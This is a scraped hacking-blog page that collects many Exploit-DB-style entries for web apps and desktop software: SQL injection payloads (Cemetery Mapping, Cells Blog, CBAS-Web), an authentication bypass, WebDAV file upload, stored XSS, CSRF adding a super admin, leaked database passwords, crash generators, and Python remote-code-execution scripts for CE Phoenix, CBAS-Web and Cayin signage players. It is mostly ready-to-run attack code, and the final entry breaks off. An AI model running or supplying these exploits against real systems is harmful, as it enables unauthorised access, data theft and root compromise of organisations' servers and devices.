# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple SQL Injections
# Exploit Author: Mesut Cetin
# Date: 2021-01-12
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "Search" bar (POST method)
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0
SQL Injection is a type of an injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case.
Explanation:
The function "person.php" takes user input through the search bar at line 45:
"$_POST['search']"
and uses it without any sanitization for the following SQL statement (line 46-49):
$sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'";
$mydb->setQuery($sql);
$cur = $mydb->executeQuery();
$numrows = $mydb->num_rows($cur);//get the number of count
A single quote (') at the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL synthax errors.
Proof of Concept:
Since the php code lacks of sanitization of the user input, multiple SQL injection queries can be found.
1. Boolean-based SQL injection
POST request the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 --
search=' or 1=1 --
2. Union-based SQL injection
To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request http://localhost/CemeteryMapping/index.php?q=person):
search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- -
If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL commands:
@@hostname : Current Hostname
@@tmpdir : Temp Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current System user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink is enabled or disabled
@@GLOBAL.have_ssl : Check if it have SSL or not
3. Time-based SQL injection
For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- -
Mitigation:
By using prepared statements and parameterized queries, the SQL injection can be prevented.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863130998
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)
# Exploit Author: Marco Catalano
# Date: 2021-01-25
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "user_email" (POST method)
# Tested on: Linux, PHP/7.4.11
Explaination:
The userAuthentication function defined in "/include/accounts.php" implements the following code:
$mydb->setQuery("SELECT * FROM `tbluseraccount` WHERE `U_USERNAME` = '". $U_USERNAME ."' and `U_PASS` = '". $h_pass ."'");
which is called when trying to log into the administrative panel at "/admin/login.php".
Proof Of Concept:
The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "janobe".
POST /admin/login.php?logout=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin/login.php?logout=1
Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
Upgrade-Insecure-Requests: 1
user_email=janobe%27+or+%271%27+%3D+%271--+-&user_pass=test&btnLogin=
# # # # #
# Exploit Title: Cells Blog 3.5 - SQL Injection
# Dork: N/A
# Date: 16.12.2017
# Vendor Homepage: http://www.cells.tw/
# Software Link: http://www.cells.tw/cells/
# Version: 3.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL]
#
# -7+UNION%20SELECT+0x253331%2c0x253332%2c0x253333%2c0x253334%2c0x253335%2c0x253336%2c0x253337%2c0x253338%2c%39%2c0x253331253330%2c0x253331253331%2c0x253331253332%2c0x253331253333%2c0x253331253334%2c0x253331253335%2c0x253331253336%2c0x253331253337%2c0x253331253338%2c0x253331253339%2d%2d%20%2d
#
# Parameter: bgid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=1 AND 9841=9841&fmid=7
#
# Parameter: fmid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=1&fmid=7 AND 2056=2056
# 2)
# http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL]
#
# Parameter: fnid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592
#
# Parameter: fmid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12
#
# Parameter: bgid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12
#
# 3)
# http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL]
#
# Parameter: fmid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2&fmid=10 AND 9273=9273
#
# Parameter: bgid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=2 AND 9536=9536&fmid=10
#
# 4)
# http://localhost/[PATH]/fourm.php?bgid=[SQL]&fmid=[SQL]
#
# Parameter: fmid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=1&fmid=2 AND 5699=5699
#
# Parameter: bgid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: bgid=1 AND 9899=9899&fmid=2
#
# # # # #
# Exploit Title: Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload
# Date: 2018-07-13
# Shodan Dork: CLR-M20
# Exploit Author: Safak Aslan
# Software Link: http://www.celalink.com
# Version: 2.7.1.6
# CVE: 2018-15137
# Authentication Required: No
# Tested on: Windows
# Vulnerability Description
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
# on the remote server, Cela Link CLR-M20 allows unauthorized users to upload
# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
# remote code execution as well.
# Due to the WebDAV, it is possible to upload the arbitrary
# file utilizing the PUT method.
# Proof-of-Concept
# Request
PUT /test.html HTTP/1.1
Host: targetIP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Content-Length: 26
the reflection of random numbers 1230123012
# Response
HTTP/1.1 201 Created
Content-Length: 0
Date: Fri, 13 Jul 2018 14:38:54 GMT
Server: lighttpd/1.4.20
As a result, on the targetIP/test.html, "the reflection of random numbers
1230123012" is reflected on the page.
# Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://phoenixcart.org/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix
## POC:
1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
4-You will be see alert button
## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)
## EXPLOIT :
import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep
class colors:
OKBLUE = '\033[94m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'
def entry_banner():
color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
colors.CRED, colors.CBEIGE]
random.shuffle(color_random)
banner = color_random[0] + """
CE Phoenix v1.0.8.20 - Remote Code Execution \n
Author: tmrswrr
"""
for char in banner:
print(char, end='')
sys.stdout.flush()
sleep(0.0045)
def get_formid_and_cookies(session, url):
response = session.get(url, allow_redirects=True)
if response.ok:
soup = BeautifulSoup(response.text, 'html.parser')
formid_input = soup.find('input', {'name': 'formid'})
if formid_input:
return formid_input['value'], session.cookies
return None, None
def perform_exploit(session, url, username, password, command):
print("\n[+] Attempting to exploit the target...")
initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
formid, cookies = get_formid_and_cookies(session, initial_url)
if not formid:
print("[-] Failed to retrieve initial formid.")
return
# Login
print("[+] Performing login...")
login_payload = {
'formid': formid,
'username': username,
'password': password
}
login_headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
'Referer': initial_url
}
login_url = url + "/admin/login.php?action=process"
login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)
if not login_response.ok:
print("[-] Login failed.")
print(login_response.text)
return
print("[+] Login successful.")
new_formid, _ = get_formid_and_cookies(session, login_response.url)
if not new_formid:
print("[-] Failed to retrieve new formid after login.")
return
# Exploit
print("[+] Executing the exploit...")
encoded_command = urllib.parse.quote_plus(command)
exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
exploit_headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
'Referer': login_response.url
}
exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)
if exploit_response.ok:
print("[+] Exploit executed successfully.")
else:
print("[-] Exploit failed.")
print(exploit_response.text)
final_response = session.get(url)
print("\n[+] Executed Command Output:\n")
print(final_response.text)
def main(base_url, username, password, command):
print("\n[+] Starting the exploitation process...")
session = requests.Session()
perform_exploit(session, base_url, username, password, command)
if __name__ == "__main__":
entry_banner()
if len(sys.argv) < 5:
print("Usage: python script.py [URL] [username] [password] [command]")
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
command = sys.argv[4]
main(base_url, username, password, command)
'''
********************************************************************************************
# Exploit Title: CDex Genre Stack Buffer Overflow
# Date: 10/9/2015
# Exploit Author: Un_N0n
# Software Link: http://cdex.mu/download
# Version: 1.79
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- Generate a File by python code mentioned below.
2- Goto C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB
3- Replace the Old CDexGenres.txt with New CDexGenres.txt which is
Produced by Python Code.
4- Open Up CDex.exe.
~Software will crash.
On Further Analysis, We come to know that it is Stack-based-BOF.
[REG-DUMP]:
EAX 00000000
ECX 779DD018 ASCII "\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n" //May be handled but yet application crashes.
EDX 0012F1A1 ASCII 0A,"STATUS_STA"
EBX 00749338 CDex.00749338
ESP 0012F3E8
EBP 0012F464
ESI 00000000
EDI 002C7AC8
EIP 779DCE96 kernel32.779DCE96
0012F3F4 002C7AC8
0012F3F8 002E25F8 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F3FC 002E5FD8
0012F400 002E44A0
0012F404 000003F8
0012F408 0000007F
0012F40C 0012F504
0012F410 00260000
0012F414 77C97B89 RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong
0012F418 002E2580 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F41C 00001190
'''
[Code to produce CDexGenres.txt]
buffer = "A"*66666
file = "CDexGenres.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
**********************************************************************************************
'''
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96 - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage: http://cdex.mu/
# Version: v1.96
# Software Link: http://cdex.mu/?q=download
# Tested On: Windows 7 x32
#
#
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
#
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
#
file="crash.txt"
crash = "A"*520 + "B"*4 #seh
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()
# Exploit Title: CdCatalog 2.3.1 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cdcat.sourceforge.net
# Software Link: https://netcologne.dl.sourceforge.net/project/cdcat/cdcat/cdcat-2.3.1/cdcat-2.3.1.tar.bz2
# Version: 2.3.1
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# CTRL+O & File/Open/exp.hcf
#!/usr/bin/python
buffer = "A" * 21
payload = buffer
try:
f=open("exp.hcf","w")
print "[+] Creating %s bytes evil payload." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created."
# Exploit Title: CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
# Discovery by: Alan Baeza
# Discovery Date: 2018-09-13
# Vendor Homepage: https://cdburnerxp.se/
# Software Link: https://cdburnerxp.se/downloadsetup.exe
# Tested Version: 4.5.8.6795
# Tested on OS : Windows 10 Pro x64 es
#!/usr/bin/env python
#-*-coding: utf-8-*-
# Steps to Produce the DoS:
# 1.- Run python code : python dos.py
# 2.- Open generate.txt and copy content to clipboard
# 3.- Open CdBurnerXP
# 4.- Select option "Copy or grab disc"
# 5.- Select checkbox target "Hard disk"
# 6.- Paste ClipBoard on "File name"
# 7.- Clic Copy disc
# 8.- DoS
import socket, os, sys
buffer = "\x41" * 260
f = open ("generate.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: CCextractor 0.80 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: http://www.ccextractor.org/
# Software Link: http://www.ccextractor.org/download-ccextractor.html
# Version: 0.80
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
from subprocess import call
from shlex import split
from time import sleep
def crash():
command = './ccextractor crash'
buffer = '\x00\x00\x00\x04ssixssixs'
with open('crash', 'w+b') as file:
file.write(buffer)
try:
call(split(command))
print("Exploit successful! ")
except:
print("Error: Something has gone wrong!")
def main():
print("Author: David Silveiro ")
print(" CCextractor 0.80 Access Violation Crash ")
sleep(2)
crash()
if __name__ == "__main__":
main()
# Exploit Title: CBAS-Web 19.0.0 - Username Enumeration
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10848
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Testing for non-valid user:
POST /cbas/index.php?m=auth&a=login HTTP/1.1
username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
# Response for non-valid user:
<!-- Failed login comments appear here -->
<p class="alert-error">randomuser</p>
========================================================================
Testing for valid user:
POST /cbas/index.php?m=auth&a=login HTTP/1.1
username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s
# Response for valid user:
<!-- Failed login comments appear here -->
<p class="alert-error">Invalid username/password combination. Please try again!</p>
# Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : N/A
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#!/usr/bin/env python
'''
Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit
Affected versions: 19.0.0 and below
by Sipke Mellema, 2019
Uses two vulnerabilities for executing commands:
- An authorization bypass in the auth module (CVE-2019-10853)
- A code execution vulnerability in the json.php endpoint (CVE-2019-10854)
Example usage:
$ python CBASWeb_19_rce.py 192.168.1.250 "cat /var/www/cbas-19.0.0/includes/db.php"
------------==[CBAS Web v19 Remote Command Injection
[*] URL: http://192.168.1.250/
[*] Executing: cat /var/www/cbas-19.0.0/includes/db.php
[*] Cookie is authenticated
[*] Creating Python payload..
[*] Sending Python payload..
[*] Server says:
<?php
// Base functions for database access
// Expects a number of constants to be set. Set settings.php
// Only allow local access to the database for security purposes
if(defined('WINDOWS') && WINDOWS){
define('MYSQL_HOST', '192.168.1.2');
define('DB_USER', 'wauser');
define('DB_PASS', 'wapwstandard');
/*define('DB_USER', 'root');
define('DB_PASS', 'souper secrit');*/
...
'''
import requests
import sys
import base64 as b
import json
def debug_print(msg, level=0):
if level == 0:
print "[*] %s" % msg
if level == 1:
print "[-] %s" % msg
# Check parameters
if len(sys.argv) < 3:
print "Missing target parameter\n\n\tUsage: %s <IP or hostname> \"<cmd>\"" % __file__
exit(0)
print "------------==[CBAS Web v18 Remote Command Injection\n"
# Set host, cookie and URL
host = sys.argv[1]
cookies = {'PHPSESSID': 'comparemetoasummersday'}
url = "http://%s/" % host
debug_print("URL: %s" % url)
# Command to execute
# Only use single quotes in cmd pls
icmd = sys.argv[2]
if '"' in icmd:
debug_print("Please don't use double quotes in your command string", level = 1)
exit(0)
debug_print("Executing: %s" % icmd)
# URL for performing auth bypass by setting the auth cookie flag to true
auth_bypass_req = "cbas/index.php?m=auth&a=agg_post&code=test"
# URL for removing auth flag from cookie (for clean-up)
logout_sess_req = "cbas/index.php?m=auth&a=logout"
# URL for command injection and session validity checking
json_checks_req = "cbas/json.php"
# Perform logout
def do_logout():
requests.get(url + logout_sess_req, cookies = cookies)
# Check if out cookie has the authentication flag
def has_auth():
ret = requests.get(url + json_checks_req, cookies = cookies)
if ret.text == "Access Forbidden":
return False
return True
# Set auth flag on cookie
def set_auth():
requests.get(url + auth_bypass_req, cookies = cookies)
# =======================================================
# Perform auth bypass if not authenticated yet
if not has_auth():
debug_print("Cookie not yet authenticated")
debug_print("Setting auth flag on cookie via auth bypass..")
set_auth()
# Check if bypass failed
if not has_auth():
debug_print("Was not able to perform authorization bypass :(")
debug_print("Exploit failed, quitting..", level = 1)
exit(0)
else:
debug_print("Cookie is authenticated")
debug_print("Creating Python payload..")
# Payload has to be encoded because the server uses the following filtering in exectools.php:
# $bad = array("..", "\\", "&", "|", ";", '/', '>', '<');
# So no slashes, etc. This means only two "'layers' of quotes"
# Create python code exec code
cmd_python = 'import os; os.system("%s")' % icmd
# Convert to Python array
cmd_array_string = str([ord(x) for x in cmd_python])
# Create command injection string
p_unencoded = "DispatchHistoryQuery\t-i \"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\"" % cmd_array_string
# Base64 encode for p parameter
p_encoded = b.b64encode(p_unencoded)
# Execute command
debug_print("Sending Python payload..")
ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded})
# Parse result
ret_parsed = json.loads(ret.text)
try:
metadata = ret_parsed["metadata"]
identifier = metadata["identifier"]
debug_print("Server says:")
print identifier
# JSON Parsing error
except:
debug_print("Error parsing result from server :(", level = 1)
# Uncomment if you want the cookie to be removed after use
# debug_print("Logging out")
# do_logout()
# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10849
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
# mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"
# Exploit Title: CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10847
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
<!-- CSRF Add Super Admin -->
<html>
<body>
<script>history.pushState('', 't00t', 'index.php')</script>
<form action="http://192.168.1.250/cbas/index.php?m=users&a=user_add_p" method="POST">
<input type="hidden" name="username_" value="Sooper" />
<input type="hidden" name="first" value="Mess" />
<input type="hidden" name="last" value="O'Bradovich" />
<input type="hidden" name="email" value="aa@bb.cc" />
<input type="hidden" name="password_" value="" />
<input type="hidden" name="notes" value="CSRFed" />
<input type="hidden" name="group_id" value="0" />
<input type="hidden" name="role" value="super" />
<input type="hidden" name="md5password" value="179edfe73d9c016b51e9dc77ae0eebb1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : N/A
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
# PoC (id param):
http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510
# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root)
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A
#!/usr/bin/env python3
#
#
# Cayin Signage Media Player 3.0 Root Remote Command Injection
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: SMP-8000QD v3.0
# SMP-8000 v3.0
# SMP-6000 v3.0 Build 19025
# SMP-6000 v1.0 Build 14246
# SMP-6000 v1.0 Build 14199
# SMP-6000 v1.0 Build 14167
# SMP-6000 v1.0 Build 14097
# SMP-6000 v1.0 Build 14090
# SMP-6000 v1.0 Build 14069
# SMP-6000 v1.0 Build 14062
# SMP-4000 v1.0 Build 14098
# SMP-4000 v1.0 Build 14092
# SMP-4000 v1.0 Build 14087
# SMP-2310 v3.0
# SMP-2300 v3.0 Build 19316
# SMP-2210 v3.0 Build 19025
# SMP-2200 v3.0 Build 19029
# SMP-2200 v3.0 Build 19025
# SMP-2100 v10.0 Build 16228
# SMP-2100 v3.0
# SMP-2000 v1.0 Build 14167
# SMP-2000 v1.0 Build 14087
# SMP-1000 v1.0 Build 14099
# SMP-PROPLUS v1.5 Build 10081
# SMP-WEBPLUS v6.5 Build 11126
# SMP-WEB4 v2.0 Build 13073
# SMP-WEB4 v2.0 Build 11175
# SMP-WEB4 v1.5 Build 11476
# SMP-WEB4 v1.5 Build 11126
# SMP-WEB4 v1.0 Build 10301
# SMP-300 v1.0 Build 14177
# SMP-200 v1.0 Build 13080
# SMP-200 v1.0 Build 12331
# SMP-PRO4 v1.0
# SMP-NEO2 v1.0
# SMP-NEO v1.0
#
# Summary: CAYIN Technology provides Digital Signage
# solutions, including media players, servers, and
# software designed for the DOOH (Digital Out-of-home)
# networks. We develop industrial-grade digital signage
# appliances and tailored services so you don't have
# to do the hard work.
#
# Desc: CAYIN SMP-xxxx suffers from an authenticated
# OS command injection vulnerability using default
# credentials. This can be exploited to inject and
# execute arbitrary shell commands as the root user
# through the 'NTP_Server_IP' HTTP GET parameter in
# system.cgi and wizard_system.cgi pages.
#
# -----------------------------------------------------
# $ ./cayin.py 192.168.1.2 id
# uid=0(root) gid=65534(guest)
# # start sshd
# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd
# $
# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'"
# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
# tcp 0 0 :::22 :::* LISTEN
# $ ./cayin.py 192.168.1.2 "cat /etc/passwd"
# root:x:0:0:root:/root:/bin/bash
# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin
# sshd:x:1000:0::/dev/null:/sbin/nologin
# $
# -----------------------------------------------------
#
# Tested on: CAYIN Technology KT-Linux v0.99
# Apache/1.3.42 (Unix)
# Apache/1.3.41 (Unix)
# PHP/5.2.5
# Linux 2.6.37
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5569
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php
#
#
# 15.05.2020
#
import requests
import sys#____
import re#_____
if len(sys.argv) < 3:
print("Cayin SMP WebManager Post-Auth RCE")
print("Usage: ./cayin.py [ip] [cmd]")
sys.exit(17)
else:
ip____address = sys.argv[1]
ex____command = sys.argv[2]
ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f"
ur____identif += (bytes(ip____address, "utf-8"))
ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69"
ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72"
ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65"
ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54"
ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50"
ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f"
ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f"
ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c"
ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72"
ur____identif += b"\x67\x25\x32\x36" ##########"
ur____identif += (bytes(ex____command, "utf-8"))
ur____identif += b"\x25\x32\x36" ##############"
ht____request = requests.get(ur____identif, auth = ("webadmin", "admin"))
re____outputs = re.search("</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n")
print(re____outputs)
# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A
#!/usr/bin/env python3
#
#
# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: 2.5.18103
# 2.0
# 1.0
#
# Summary: CAYIN xPost is the web-based application software, which offers a
# combination of essential tools to create rich contents for digital signage in
# different vertical markets. It provides an easy-to-use platform for instant
